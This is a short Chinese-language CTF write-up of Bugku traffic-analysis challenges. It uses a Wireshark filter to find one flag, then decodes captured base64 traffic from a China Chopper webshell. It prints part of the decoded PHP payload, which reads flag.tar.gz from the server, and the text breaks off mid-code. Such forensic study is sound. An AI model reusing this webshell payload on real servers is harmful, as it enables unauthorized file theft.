当你的才华撑不起你的野心的时候,那就好好学习吧!
为了更好的巩固最近学习的流量分析,决定找几个靶场来练练,就拿bugku开始吧!
flag被盗
这个比较简单
直接使用过滤器:http contains "flag"
出现了两个流量包,跟踪tcp流,
然后就能找到flag
flag为:flag{This_is_a_f10g}
中国菜刀
想着要用菜刀,一般要用一句话木马,使用“http”过滤了一下
一个一个包去看,将里面的内容进行base64解密,直到发现了下面这个包
@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<'5.3.0')
{
@set_magic_quotes_runtime(0);
};
echo("X@Y");
$F="C:\\wwwroot\\flag.tar.gz";
$fp=@fopen($F,'r')